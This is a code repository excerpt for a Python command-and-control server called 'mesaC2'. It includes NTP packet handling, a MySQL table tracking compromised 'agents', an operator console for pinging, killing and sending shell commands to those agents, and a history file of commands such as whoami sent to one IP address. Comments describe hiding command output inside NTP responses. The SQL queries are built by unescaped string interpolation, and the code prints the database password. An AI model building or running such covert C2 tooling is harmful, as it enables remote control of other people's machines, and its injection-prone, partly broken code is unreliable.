125 | _to_frac(self.root_dispersion, 16),
126 | self.ref_id,
127 | _to_int(self.ref_timestamp),
128 | _to_frac(self.ref_timestamp),
129 | #Change by lichen, avoid loss of precision
130 | self.orig_timestamp_high,
131 | self.orig_timestamp_low,
132 | _to_int(self.recv_timestamp),
133 | _to_frac(self.recv_timestamp),
134 | _to_int(self.tx_timestamp),
135 | _to_frac(self.tx_timestamp))
136 | except struct.error:
137 | return None
138 |
139 | return packed
140 |
141 | def from_data(self, data):
142 | try:
143 | unpacked = struct.unpack(NTPPacket._PACKET_FORMAT,
144 | data[0:struct.calcsize(NTPPacket._PACKET_FORMAT)])
145 | return "working"
146 | except struct.error:
147 | return None
148 |
149 |
150 | self.leap = unpacked[0] >> 6 & 0x3
151 | self.version = unpacked[0] >> 3 & 0x7
152 | self.mode = unpacked[0] & 0x7
153 | self.stratum = unpacked[1]
154 | self.poll = unpacked[2]
155 | self.precision = unpacked[3]
156 | self.root_delay = float(unpacked[4])/2**16
157 | self.root_dispersion = float(unpacked[5])/2**16
158 | self.ref_id = unpacked[6]
159 | self.ref_timestamp = _to_time(unpacked[7], unpacked[8])
160 | self.orig_timestamp = _to_time(unpacked[9], unpacked[10])
161 | self.orig_timestamp_high = unpacked[9]
162 | self.orig_timestamp_low = unpacked[10]
163 | self.recv_timestamp = _to_time(unpacked[11], unpacked[12])
164 | self.tx_timestamp = _to_time(unpacked[13], unpacked[14])
165 | self.tx_timestamp_high = unpacked[13]
166 | self.tx_timestamp_low = unpacked[14]
167 |
168 | def GetTxTimeStamp(self):
169 | return (self.tx_timestamp_high,self.tx_timestamp_low)
170 |
171 | def SetOriginTimeStamp(self,high,low):
172 | self.orig_timestamp_high = high
173 | self.orig_timestamp_low = low
174 |
175 |
176 | def resync(socket, data, addr):
177 |
178 | taskQueue = Queue.Queue()
179 |
180 | recvTimestamp = system_to_ntp_time(time.time())
181 | taskQueue.put((data,addr,recvTimestamp))
182 |
183 | data,addr,recvTimestamp = taskQueue.get(timeout=1)
184 | recvPacket = NTPPacket()
185 | retvalue = recvPacket.from_data(data)
186 | if retvalue == None:
187 | return
188 |
189 | timeStamp_high,timeStamp_low = recvPacket.GetTxTimeStamp()
190 | sendPacket = NTPPacket(version=3,mode=4)
191 | sendPacket.stratum = 2
192 | sendPacket.poll = 10
193 |
194 | sendPacket.ref_timestamp = recvTimestamp-5
195 | sendPacket.SetOriginTimeStamp(timeStamp_high,timeStamp_low)
196 | print(sendPacket.orig_timestamp, sendPacket.orig_timestamp_high, sendPacket.orig_timestamp_low)
197 | sendPacket.recv_timestamp = recvTimestamp
198 | sendPacket.tx_timestamp = system_to_ntp_time(time.time())
199 |
200 | retvalue = sendPacket.to_data()
201 | if retvalue == None:
202 | return
203 |
204 | socket.sendto(retvalue,addr)
--------------------------------------------------------------------------------
/pythonserver/teamserver/db.py:
--------------------------------------------------------------------------------
1 | import mysql.connector
2 | import datetime
3 | import getpass
4 |
5 | from termcolor import colored
6 |
7 |
8 | class DB:
9 | def __init__(self):
10 | print("Setting up DB...")
11 | print(colored("Make sure MySQL Server is running.", "yellow"))
12 | username = input("Enter MySQL username: ")
13 | password = getpass.getpass(prompt="Enter MySQL password: ")
14 | print(password)
15 | self.mydb = mysql.connector.connect(
16 | host="localhost",
17 | user=username,
18 | password=password,
19 | auth_plugin="mysql_native_password",
20 | )
21 |
22 | self.mycursor = self.mydb.cursor(buffered=True)
23 |
24 | self.mycursor.execute("create database if not exists mesaC2") # create msql db
25 |
26 | self.mycursor.execute("use mesaC2")
27 |
28 | self.mycursor.execute(
29 | "create table if not exists agents("
30 | "agentID varchar(16) not null primary key,"
31 | "os varchar(255) null,"
32 | "service varchar(255) null,"
33 | "status varchar(10) not null default 'ALIVE',"
34 | "pingtimestamp timestamp null)"
35 | )
36 |
37 | # for large entries testing
38 | # for i in range(1, 50):
39 | # ip = "10.5.6." + str(i)
40 | # sqlcmd = ("insert into agents (agentid, pingtimestamp) values (%s, %s)")
41 | # values = (ip, "2021-04-03 12:49:31")
42 |
43 | # self.mycursor.execute(sqlcmd, values)
44 | # self.mydb.commit()
45 |
46 | # DB MODS
47 | def addAgent(
48 | self, ip, timestamp, status
49 | ): # INTERNAL, when receive first (setup) ping
50 | sqlcmd = (
51 | "insert into agents (agentID, pingtimestamp, status) values (%s, %s, %s)"
52 | )
53 | values = (str(ip), str(timestamp), status)
54 |
55 | self.mycursor.execute(sqlcmd, values)
56 | self.mydb.commit()
57 |
58 | print(colored(f"\n\n[+] Agent {ip} added!\n", "green"))
59 |
60 | def deleteAgent(self, ip): # INTERNAL, for kill command
61 | self.mycursor.execute(f"delete from agents where agentID='{ip}'")
62 |
63 | self.mydb.commit()
64 | print(colored(f"[*] Agent {ip} deleted!\n", "yellow"))
65 |
66 | def dbPull(self): # PUBLIC
67 | self.checkStatus()
68 |
69 | self.mycursor.execute(
70 | "select * from agents order by isnull(service), service asc"
71 | )
72 | return self.mycursor.fetchall()
73 |
74 | def pullSpecific(
75 | self, grouping, value
76 | ): # INTERNAL, use this when sending group commands?
77 | self.checkStatus()
78 |
79 | self.mycursor.execute(f"select * from agents where {grouping}='{value}'")
80 | return self.mycursor.fetchall()
81 |
82 | def addGrouping(self, ip, typ, grouping): # PUBLIC
83 | ipArr = []
84 | lBracketCount = ip.count("[")
85 | rBracketCount = ip.count("]")
86 | colonCount = ip.count(":")
87 |
88 | if lBracketCount == 1 and rBracketCount == 1 and colonCount == 1:
89 | lbl = ip.find(".[")
90 | rbl = ip.find("]")
91 | cl = ip.find(":")
92 | low = int(ip[lbl + 2 : cl])
93 | high = int(ip[cl + 1 : rbl])
94 |
95 | for i in range(low, high + 1):
96 | template = ip[0 : lbl + 1]
97 | template += str(i)
98 | template += ip[rbl + 1 :]
99 | ipArr.append(template)
100 |
101 | elif lBracketCount == 0 and rBracketCount == 0:
102 | ipArr.append(ip)
103 | else:
104 | return
105 |
106 | for addr in ipArr:
107 | sqlcmd = f"update agents set {typ} = '{grouping}' where agentID = '{addr}'"
108 | self.mycursor.execute(sqlcmd)
109 | self.mydb.commit()
110 |
111 | print(
112 | colored(
113 | f'[+] Identifier "{grouping}" added to Agent {addr}!\n', "green"
114 | )
115 | )
116 |
117 | def removeAllAgents(self): # PUBLIC, removes all agents
118 | self.mycursor.execute("delete from agents")
119 |
120 | self.mydb.commit()
121 | print(colored("[*] All agents removed!\n", "yellow"))
122 |
123 | def updateTimestamp(self, tstamp, agent): # INTERNAL, updates on resync request
124 | sqlcmd = "insert into agents (pingtimestamp) values (%s) where agentID='%s'"
125 | values = (tstamp, agent)
126 |
127 | self.mycursor.execute(sqlcmd, values)
128 | self.mydb.commit()
129 |
130 | def describe(self):
131 | self.mycursor.execute("desc agents")
132 | for value in self.mycursor.fetchall():
133 | print(value)
134 | print("")
135 |
136 | # STATUS CHECKS
137 | def missingStatus(self, ip): # INTERNAL, after 3 pings missed (timestamp+3min)
138 | self.mycursor.execute(
139 | "update agents " "set status = 'MIA'" f"where agentID ='{ip}'"
140 | )
141 |
142 | self.mydb.commit()
143 | # print(colored(f" Agent {ip} is MIA!\n", "yellow"))
144 |
145 | def deadStatus(self, ip): # PUBLIC, after agent killed
146 | sqlcmd = "update agents set status=%s where agentid=%s"
147 | val = ("SRV-KILLED", str(ip))
148 | self.mycursor.execute(sqlcmd, val)
149 |
150 | self.mydb.commit()
151 |
152 | # print(colored(f" Agent {ip} is dead!\n", "red"))
153 |
154 | def aliveStatus(self, ip, timestamp): # INTERNAL, after receiving beacon
155 | self.mycursor.execute(f"select agentID from agents where agentID = '{ip}'")
156 | resp = self.mycursor.fetchall()
157 | if len(resp) == 0:
158 | self.addAgent(ip, timestamp, "ALIVE")
159 | else:
160 | self.mycursor.execute(
161 | "update agents "
162 | f"set status = 'ALIVE',pingtimestamp='{timestamp}' "
163 | f"where agentID = '{ip}'"
164 | )
165 |
166 | self.mydb.commit()
167 |
168 | # print(colored(f" \nPing from agent {ip}!\n", "green"))
169 |
170 | def checkStatus(self): # internal, called on each summon of the table
171 | tscurrent = datetime.datetime.now()
172 | strcurrent = "{:%Y-%m-%d %H:%M:%S}".format(tscurrent)
173 |
174 | t2 = datetime.datetime.strptime(strcurrent, "%Y-%m-%d %H:%M:%S")
175 |
176 | self.mycursor.execute("select pingtimestamp,agentID,status from agents")
177 | data = self.mycursor.fetchall()
178 | if len(data) == 0:
179 | return # skip if no agents in table
180 |
181 | for entry in data:
182 | check = "{:%Y-%m-%d %H:%M:%S}".format(entry[0]) # %Y-%m-%d %H:%M:%S
183 | t1 = datetime.datetime.strptime(check, "%Y-%m-%d %H:%M:%S")
184 |
185 | difference = t2 - t1
186 |
187 | if difference.seconds / 60 > 3.0 and entry[2] != "SRV-KILLED":
188 | self.missingStatus(entry[1])
189 |
190 | def cleanDB(self): # EXTERNAL, called on 'shutdown'
191 | self.removeAllAgents()
192 | self.mycursor.execute("drop table agents")
193 | self.mydb.commit()
194 | print(colored("\n[*] Dropping agents table...", "yellow"))
195 | self.mycursor.execute("drop database mesaC2")
196 | self.mydb.commit()
197 | print(colored("\n[*] Deleting database mesaC2...\n", "yellow"))
198 |
--------------------------------------------------------------------------------
/pythonserver/prompts.py:
--------------------------------------------------------------------------------
1 | from teamserver import teamserver
2 | from server import c2
3 |
4 | from prompt_toolkit import prompt
5 | from prompt_toolkit.history import FileHistory
6 | from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
7 | from prompt_toolkit.completion import WordCompleter
8 | from termcolor import colored
9 |
10 | from os import system
11 |
12 |
13 | def mesaPrompt(TS): # TS is teamserver object
14 | f = open("textfiles/logo.txt", "r")
15 | reading = f.read()
16 | print(colored(reading, "red"))
17 | print('\nEnter "help" for list of commands.\n')
18 |
19 | baseCMDs = ["agents", "db", "interact", "clear", "help", "exit", "shutdown"]
20 | MesaCompleter = WordCompleter(baseCMDs, ignore_case=True)
21 |
22 | while True:
23 | user_input = (
24 | prompt(
25 | "MESA ~ ",
26 | history=FileHistory("textfiles/history.txt"),
27 | auto_suggest=AutoSuggestFromHistory(),
28 | completer=MesaCompleter,
29 | )
30 | ).lower()
31 |
32 | if user_input == "exit":
33 | print("\nTime, Dr. Freeman?\nIs it really that time again?\n")
34 | exit()
35 |
36 | elif "interact" in user_input:
37 | interactHelper(user_input, TS)
38 |
39 | else:
40 | ops = {
41 | "agents": (TS.displayBoard, "nothing"),
42 | "db": (dbPrompt, TS),
43 | "clear": (system, "clear"),
44 | "help": (mesaHelp, "nothing"),
45 | "shutdown": (TS.shutdown, "nothing"),
46 | "": (doNothing, "nothing"), # equal to pass
47 | }
48 |
49 | operation(user_input, ops)
50 |
51 |
52 | def interactHelper(user_input, TS):
53 | arr = user_input.split(" ")
54 | try:
55 | if arr[1] == "agent" or arr[1] == "a":
56 | dbType = "agentid"
57 | interactType = "agent"
58 |
59 | elif arr[1] == "os" or arr[1] == "o":
60 | dbType = "os"
61 | interactType = "os"
62 |
63 | elif arr[1] == "service" or arr[1] == "s":
64 | dbType = "service"
65 | interactType = "service"
66 |
67 | else:
68 | raise Exception
69 |
70 | data = TS.getDBObj().pullSpecific(dbType, arr[2])
71 | if len(data) == 0:
72 | print(colored(f'[-] {interactType} "{arr[2]}" does not exist.\n', "yellow"))
73 | return
74 |
75 | interactPrompt(interactType, arr[2], TS)
76 |
77 | except Exception:
78 | print(
79 | colored(
80 | "[-] Incorrect arguments given.\n SYNTAX: interact \n",
81 | "yellow",
82 | )
83 | )
84 |
85 |
86 | def dbPrompt(TS):
87 | dbCMDs = ["group", "agents", "removeall", "help", "meta", "back"]
88 | dbCompleter = WordCompleter(dbCMDs, ignore_case=True)
89 | while True:
90 | user_input = (
91 | prompt(
92 | "MESA {DB} ~ ",
93 | history=FileHistory("textfiles/history.txt"),
94 | auto_suggest=AutoSuggestFromHistory(),
95 | completer=dbCompleter,
96 | )
97 | ).lower()
98 |
99 | if user_input == "back":
100 | return
101 |
102 | if "group" in user_input:
103 | arr = user_input.split(" ")
104 | # try:
105 | TS.getDBObj().addGrouping(arr[1], arr[2], arr[3])
106 | # except Exception:
107 | # print(colored("[-] Incorrect syntax. Should be \'group \'", 'yellow'))
108 | else:
109 | ops = {
110 | "agents": (TS.displayBoard, "nothing"),
111 | "removeall": (removeallHelper, TS),
112 | "clear": (system, "clear"),
113 | "help": (dbHelp, "nothing"),
114 | "meta": (TS.getDBObj().describe, "nothing"),
115 | "": (doNothing, "nothing"), # equal to pass
116 | }
117 |
118 | operation(user_input, ops)
119 |
120 |
121 | def removeallHelper(TS):
122 | confirmation = (input("Confirm (y/n)? ")).lower()
123 | if confirmation == "y":
124 | TS.getDBObj().removeAllAgents()
125 |
126 | elif confirmation == "n":
127 | pass # back to prompt
128 |
129 |
130 | def interactPrompt(interactType, id, TS):
131 | interactCMDs = ["ping", "kill", "cmd", "agents", "help", "back"]
132 | interactCompleter = WordCompleter(interactCMDs, ignore_case=True)
133 | while True:
134 | user_input = (
135 | prompt(
136 | "MESA {" + interactType + "/" + id + "} ~ ",
137 | history=FileHistory("textfiles/history.txt"),
138 | auto_suggest=AutoSuggestFromHistory(),
139 | completer=interactCompleter,
140 | )
141 | ).lower()
142 |
143 | if user_input == "back":
144 | return
145 |
146 | elif user_input == "ping":
147 | c2.sendRefCMD(TS, interactType, id, "PING")
148 |
149 | elif user_input == "cmd":
150 | cmdPrompt(TS, interactType, id)
151 |
152 | elif user_input == "agents":
153 | TS.displayBoard(all=False, interactType=interactType, id=id)
154 |
155 | elif user_input == "kill":
156 | killHelper(TS, interactType, id)
157 |
158 | elif user_input == "":
159 | continue
160 |
161 | elif user_input == "clear":
162 | system("clear")
163 |
164 | elif user_input == "help":
165 | interactHelp()
166 |
167 | else:
168 | invalid_op()
169 |
170 |
171 | def killHelper(TS, interactType, id):
172 | confirmation = (input("Confirm (y/n)? ")).lower()
173 | if confirmation == "y":
174 | c2.sendRefCMD(TS, interactType, id, "KILL")
175 |
176 | return # back to interact prompt
177 |
178 |
179 | def cmdPrompt(TS, interactType, id):
180 | cmds = ["help", "back"]
181 | cmdCompleter = WordCompleter(cmds, ignore_case=True)
182 | while True:
183 | user_input = (
184 | prompt(
185 | "MESA {" + interactType + "/" + id + "/CMD} ~ ",
186 | history=FileHistory("textfiles/history.txt"),
187 | auto_suggest=AutoSuggestFromHistory(),
188 | completer=cmdCompleter,
189 | )
190 | ).lower()
191 |
192 | if user_input == "back":
193 | return
194 |
195 | elif user_input == "":
196 | continue
197 |
198 | elif user_input == "clear":
199 | system("clear")
200 |
201 | elif user_input == "help":
202 | cmdHelp()
203 |
204 | else:
205 | # TODO sending quotes (and other chars) is being weird, fix this
206 | # TODO on client, make command run in background (ie linux &)?
207 | c2.sendCMD(TS, user_input, interactType, id)
208 | # C: get output and encode in NTP response
209 | # S: decode output
210 | # S: send output to TS
211 | # TS: print output in prompt
212 |
213 |
214 | def operation(user_input, ops):
215 | obtained = ops.get(user_input, invalid_op)
216 | if obtained == invalid_op:
217 | invalid_op()
218 |
219 | else:
220 | fctn = obtained[0]
221 | args = obtained[1]
222 |
223 | if args == "nothing":
224 | fctn()
225 | else:
226 | fctn(args)
227 |
228 |
229 | def doNothing():
230 | pass
231 |
232 |
233 | def invalid_op():
234 | print(
235 | colored('[-] Command not recognized. Enter "help" for command list.\n', "red")
236 | )
237 |
238 |
239 | def cmdHelp():
240 | print("Subcommand List")
241 | print(
242 | colored(
243 | " ~ send CMD to agent.\n "
244 | "help ~ display this list of commands.\n "
245 | "back ~ return to the interact prompt.\n",
246 | "yellow",
247 | )
248 | )
249 |
250 |
251 | def interactHelp():
252 | print("Interact Subcommand List")
253 | print(
254 | colored(
255 | " ping ~ ping agent.\n "
256 | "kill ~ send kill command to agent. confirmed with y/n.\n "
257 | "cmd ~ enter the cmd subprompt.\n "
258 | "agents ~ display agents under the interact filters.\n "
259 | "help ~ display this list of commands.\n "
260 | "back ~ return to the main prompt.\n",
261 | "yellow",
262 | )
263 | )
264 |
265 |
266 | def dbHelp():
267 | print("DB Subcommand List")
268 | print(
269 | colored(
270 | ' group ~ add a service identifier to an agent. Can specify a IP range. Ex. "group 10.1.[1:15].3 service SMB"\n '
271 | "agents ~ list all agent entries.\n "
272 | "removeall ~ remove all agents from the database.\n "
273 | "meta ~ describe the agent tables metadata.\n "
274 | "help ~ display this list of commands.\n "
275 | "back ~ return to the main prompt.\n",
276 | "yellow",
277 | )
278 | )
279 |
280 |
281 | def mesaHelp():
282 | print("Base Command List")
283 | print(
284 | colored(
285 | " agents ~ display the board of agent entries.\n "
286 | "db ~ enter the database subprompt.\n "
287 | "interact ~ enter the interact subprompt. Ping/kill agents, or enter the CMD subprompt here.\n "
288 | "help ~ display this list of commands.\n "
289 | "exit ~ quit the program, state will be saved.\n "
290 | "shutdown ~ quit the program, all agents are killed, database is cleaned.\n",
291 | "yellow",
292 | )
293 | )
294 |
--------------------------------------------------------------------------------
/pythonserver/textfiles/history.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 | # 2021-03-16 13:24:54.572246
4 | +sl
5 |
6 | # 2021-03-16 13:24:55.295861
7 | +ls
8 |
9 | # 2021-03-16 13:25:03.132870
10 | +interact
11 |
12 | # 2021-03-16 14:01:28.761070
13 | +db
14 |
15 | # 2021-03-16 14:01:29.691833
16 | +back
17 |
18 | # 2021-03-16 14:01:30.894087
19 | +ls
20 |
21 | # 2021-03-16 14:01:34.555430
22 | +agents
23 |
24 | # 2021-03-16 14:01:40.487445
25 | +interact a yeah
26 |
27 | # 2021-03-16 14:01:41.749593
28 | +ls
29 |
30 | # 2021-03-16 14:01:43.558323
31 | +ping
32 |
33 | # 2021-03-16 15:21:59.705410
34 | +ls
35 |
36 | # 2021-03-16 15:22:09.150639
37 | +interact a 129.21.100.241
38 |
39 | # 2021-03-16 15:22:10.577946
40 | +ls
41 |
42 | # 2021-03-16 15:26:50.427877
43 | +clear
44 |
45 | # 2021-03-16 15:26:51.146814
46 | +ls
47 |
48 | # 2021-03-16 15:27:02.778846
49 | +ping
50 |
51 | # 2021-03-16 15:27:15.698149
52 | +kill
53 |
54 | # 2021-03-16 15:27:29.102111
55 | +cmd
56 |
57 | # 2021-03-16 15:27:30.191523
58 | +ls
59 |
60 | # 2021-03-16 15:27:33.744385
61 | +echo hello world
62 |
63 | # 2021-03-16 15:31:49.420115
64 | +ls
65 |
66 | # 2021-03-16 15:31:51.695053
67 | +interact a 129.21.100.241
68 |
69 | # 2021-03-16 15:31:52.758433
70 | +ls
71 |
72 | # 2021-03-16 15:31:54.045694
73 | +cmd
74 |
75 | # 2021-03-16 15:31:56.628243
76 | +echo hello world
77 |
78 | # 2021-03-16 15:32:38.004984
79 | +exit
80 |
81 | # 2021-03-16 15:32:49.290788
82 | +ls
83 |
84 | # 2021-03-16 15:32:50.813554
85 | +interact a 129.21.100.241
86 |
87 | # 2021-03-16 15:32:51.796721
88 | +cmd
89 |
90 | # 2021-03-16 15:32:53.739848
91 | +echo hello world
92 |
93 | # 2021-03-16 15:34:20.379271
94 | +back
95 |
96 | # 2021-03-16 15:34:21.940713
97 | +exit
98 |
99 | # 2021-03-16 15:34:27.724640
100 | +interact a 129.21.100.241
101 |
102 | # 2021-03-16 15:34:29.363645
103 | +cmd
104 |
105 | # 2021-03-16 15:34:30.709816
106 | +echo hello world
107 |
108 | # 2021-03-16 15:34:37.079867
109 | +back
110 |
111 | # 2021-03-16 15:34:38.211691
112 | +ls
113 |
114 | # 2021-03-16 15:34:39.456872
115 | +ping
116 |
117 | # 2021-03-16 15:36:05.653088
118 | +back
119 |
120 | # 2021-03-16 15:36:06.735181
121 | +exit
122 |
123 | # 2021-03-16 15:36:12.389222
124 | +interact a 129.21.100.241
125 |
126 | # 2021-03-16 15:36:13.307707
127 | +cmd
128 |
129 | # 2021-03-16 15:36:17.439205
130 | +echo hello world
131 |
132 | # 2021-03-16 15:37:18.328409
133 | +back
134 |
135 | # 2021-03-16 15:37:19.699691
136 | +exit
137 |
138 | # 2021-03-16 15:37:24.699045
139 | +interact a 129.21.100.241
140 |
141 | # 2021-03-16 15:37:26.631853
142 | +ping
143 |
144 | # 2021-03-16 15:37:38.442904
145 | +kill
146 |
147 | # 2021-03-16 15:37:42.078560
148 | +cmd
149 |
150 | # 2021-03-16 15:37:50.322762
151 | +echo hey what's good i really want to meet you
152 |
153 | # 2021-03-16 15:38:31.156890
154 | +back
155 |
156 | # 2021-03-16 15:38:31.657659
157 | +ls
158 |
159 | # 2021-03-16 15:38:33.792546
160 | +back
161 |
162 | # 2021-03-16 15:38:36.954438
163 | +interact
164 |
165 | # 2021-03-16 15:39:31.159701
166 | +help
167 |
168 | # 2021-03-16 15:39:36.735900
169 | +interact os windows
170 |
171 | # 2021-03-16 15:39:38.641198
172 | +ls
173 |
174 | # 2021-03-16 15:40:25.559141
175 | +ping
176 |
177 | # 2021-03-16 15:40:27.498362
178 | +kill
179 |
180 | # 2021-03-16 15:40:29.852276
181 | +cmd
182 |
183 | # 2021-03-16 15:40:31.109942
184 | +yeah
185 |
186 | # 2021-03-16 15:40:35.782935
187 | +clear
188 |
189 | # 2021-03-16 15:40:37.424235
190 | +back
191 |
192 | # 2021-03-16 15:40:38.995525
193 | +exit
194 |
195 | # 2021-03-16 15:41:54.070991
196 | +interact os windows
197 |
198 | # 2021-03-16 15:41:56.009132
199 | +cmd
200 |
201 | # 2021-03-16 15:41:56.829691
202 | +ls
203 |
204 | # 2021-03-16 15:42:19.692273
205 | +list
206 |
207 | # 2021-03-16 15:42:24.431970
208 | +waht's good
209 |
210 | # 2021-03-16 15:44:07.970687
211 | +back
212 |
213 | # 2021-03-16 15:44:10.625182
214 | +exit
215 |
216 | # 2021-03-16 15:44:17.145431
217 | +interact os windows
218 |
219 | # 2021-03-16 15:44:18.557083
220 | +ls
221 |
222 | # 2021-03-16 15:44:19.626463
223 | +cmd
224 |
225 | # 2021-03-16 15:44:23.131920
226 | +echo hey what's good i really want to meet you
227 |
228 | # 2021-03-16 15:45:06.393983
229 | +back
230 |
231 | # 2021-03-16 15:45:08.443466
232 | +exit
233 |
234 | # 2021-03-16 15:45:12.823024
235 | +interact os windows
236 |
237 | # 2021-03-16 15:45:13.412354
238 | +ls
239 |
240 | # 2021-03-16 15:45:14.831659
241 | +cmd
242 |
243 | # 2021-03-16 15:45:16.784947
244 | +echo hey what's good i really want to meet you
245 |
246 | # 2021-03-16 15:45:27.357896
247 | +back
248 |
249 | # 2021-03-16 15:45:28.679740
250 | +exit
251 |
252 | # 2021-03-16 15:45:45.164078
253 | +interact a 129.21.100.241
254 |
255 | # 2021-03-16 15:45:46.417664
256 | +cmd
257 |
258 | # 2021-03-16 15:45:48.329011
259 | +echo hey what's good i really want to meet you
260 |
261 | # 2021-03-16 15:46:30.558543
262 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
263 |
264 | # 2021-03-16 15:48:45.018288
265 | +exi
266 |
267 | # 2021-03-16 15:48:48.076482
268 | +exit
269 |
270 | # 2021-03-16 15:48:56.440130
271 | +interact a 129.21.100.241
272 |
273 | # 2021-03-16 15:49:00.974928
274 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
275 |
276 | # 2021-03-16 15:49:03.903920
277 | +cmd
278 |
279 | # 2021-03-16 15:49:05.500435
280 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
281 |
282 | # 2021-03-16 15:49:44.097786
283 | +back
284 |
285 | # 2021-03-16 15:49:45.569516
286 | +exit
287 |
288 | # 2021-03-16 15:49:49.160897
289 | +interact a 129.21.100.241
290 |
291 | # 2021-03-16 15:49:50.069847
292 | +cmd
293 |
294 | # 2021-03-16 15:49:51.552371
295 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
296 |
297 | # 2021-03-16 15:50:56.895954
298 | +back
299 |
300 | # 2021-03-16 15:50:59.255764
301 | +exit
302 |
303 | # 2021-03-16 15:51:03.325311
304 | +interact a 129.21.100.241
305 |
306 | # 2021-03-16 15:51:04.111484
307 | +cmd
308 |
309 | # 2021-03-16 15:51:05.498078
310 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
311 |
312 | # 2021-03-16 15:51:29.139232
313 | +back
314 |
315 | # 2021-03-16 15:51:35.828207
316 | +exit
317 |
318 | # 2021-03-16 15:51:38.959569
319 | +ls
320 |
321 | # 2021-03-16 15:51:43.433136
322 | +interact a 129.21.100.241
323 |
324 | # 2021-03-16 15:51:44.707965
325 | +cmd
326 |
327 | # 2021-03-16 15:51:46.305936
328 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
329 |
330 | # 2021-03-16 15:53:48.496498
331 | +exit
332 |
333 | # 2021-03-16 15:53:57.416950
334 | +ls
335 |
336 | # 2021-03-16 15:53:59.261934
337 | +interact a 129.21.100.241
338 |
339 | # 2021-03-16 15:54:00.101209
340 | +cmd
341 |
342 | # 2021-03-16 15:54:01.539464
343 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
344 |
345 | # 2021-03-16 15:54:58.690436
346 | +back
347 |
348 | # 2021-03-16 15:55:00.101540
349 | +exit
350 |
351 | # 2021-03-16 15:58:15.180096
352 | +ls
353 |
354 | # 2021-03-16 15:58:16.594168
355 | +help
356 |
357 | # 2021-03-16 15:58:19.226836
358 | +interact a 129.21.100.241
359 |
360 | # 2021-03-16 15:58:20.495150
361 | +cmd
362 |
363 | # 2021-03-16 15:58:22.905575
364 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
365 |
366 | # 2021-03-16 15:59:32.256812
367 | +back
368 |
369 | # 2021-03-16 15:59:33.929248
370 | +exit
371 |
372 | # 2021-03-16 15:59:38.554133
373 | +interact a 129.21.100.241
374 |
375 | # 2021-03-16 15:59:39.727663
376 | +ls
377 |
378 | # 2021-03-16 15:59:40.705553
379 | +cmd
380 |
381 | # 2021-03-16 15:59:42.557132
382 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
383 |
384 | # 2021-03-16 16:05:14.428909
385 | +exit
386 |
387 | # 2021-03-16 16:05:16.009736
388 | +back
389 |
390 | # 2021-03-16 16:05:17.467684
391 | +exit
392 |
393 | # 2021-03-16 16:05:27.146847
394 | +help
395 |
396 | # 2021-03-16 16:05:28.746936
397 | +interact a 129.21.100.241
398 |
399 | # 2021-03-16 16:05:30.782321
400 | +ls
401 |
402 | # 2021-03-16 16:05:32.318675
403 | +help
404 |
405 | # 2021-03-16 16:05:34.926001
406 | +ping
407 |
408 | # 2021-03-16 16:05:40.579767
409 | +kill
410 |
411 | # 2021-03-16 16:06:34.523531
412 | +ls
413 |
414 | # 2021-03-16 16:06:35.224522
415 | +cmd
416 |
417 | # 2021-03-16 16:06:36.069837
418 | +ls
419 |
420 | # 2021-03-16 16:07:08.426020
421 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
422 |
423 | # 2021-03-16 16:07:45.310303
424 | +back
425 |
426 | # 2021-03-16 16:07:47.880247
427 | +db
428 |
429 | # 2021-03-16 16:07:49.200905
430 | +ls
431 |
432 | # 2021-03-16 16:07:50.175413
433 | +help
434 |
435 | # 2021-03-16 16:07:57.409744
436 | +group 129.21.100.241 macos
437 |
438 | # 2021-03-16 16:10:56.384380
439 | +back
440 |
441 | # 2021-03-16 16:10:57.141926
442 | +exit
443 |
444 | # 2021-03-16 17:44:51.509072
445 | +help
446 |
447 | # 2021-03-16 17:44:55.120132
448 | +exit
449 |
450 | # 2021-03-16 17:49:21.805921
451 | +shutdown
452 |
453 | # 2021-03-16 17:50:16.127723
454 | +help
455 |
456 | # 2021-03-16 17:50:22.867404
457 | +db
458 |
459 | # 2021-03-16 17:50:30.343298
460 | +s
461 |
462 | # 2021-03-16 17:50:31.688195
463 | +ls
464 |
465 | # 2021-03-16 17:50:32.881308
466 | +help
467 |
468 | # 2021-03-16 17:56:29.186310
469 | +exit
470 |
471 | # 2021-03-16 18:26:33.788182
472 | +interact a 129.21.100.241
473 |
474 | # 2021-03-16 18:26:35.422747
475 | +cmd
476 |
477 | # 2021-03-16 18:26:37.246065
478 | +whoami
479 |
480 | # 2021-03-16 18:27:13.412007
481 | +interact a 129.21.100.241
482 |
483 | # 2021-03-16 18:27:14.390901
484 | +cmd
485 |
486 | # 2021-03-16 18:27:15.464024
487 | +whoami
488 |
489 | # 2021-03-16 18:27:38.198729
490 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
491 |
492 | # 2021-03-16 18:27:51.724871
493 | +back
494 |
495 | # 2021-03-16 18:27:55.279753
496 | +exit
497 |
498 | # 2021-03-16 18:28:18.200073
499 | +interact a 129.21.100.241
500 |
501 | # 2021-03-16 18:28:19.073076
502 | +cmd
503 |
504 | # 2021-03-16 18:28:19.999532
505 | +whoami
506 |
507 | # 2021-03-16 18:31:24.391882
508 | +interact a 129.21.100.241
509 |
510 | # 2021-03-16 18:31:25.010797
511 | +cmd
512 |
513 | # 2021-03-16 18:31:25.877954
514 | +whoami
515 |
516 | # 2021-03-16 18:37:41.783748
517 | +interact a 129.21.100.241
518 |
519 | # 2021-03-16 18:37:42.835789
520 | +cmd
521 |
522 | # 2021-03-16 18:37:45.448190
523 | +whoami
524 |
525 | # 2021-03-16 18:52:20.786321
526 | +back
527 |
528 | # 2021-03-16 18:52:22.183448
529 | +exit
530 |
531 | # 2021-03-16 18:52:37.043723
532 | +interact a 129.21.100.241
533 |
534 | # 2021-03-16 18:52:38.417882
535 | +cmd
536 |
537 | # 2021-03-16 18:52:40.321252
538 | +whoam
539 |
540 | # 2021-03-16 19:02:09.067440
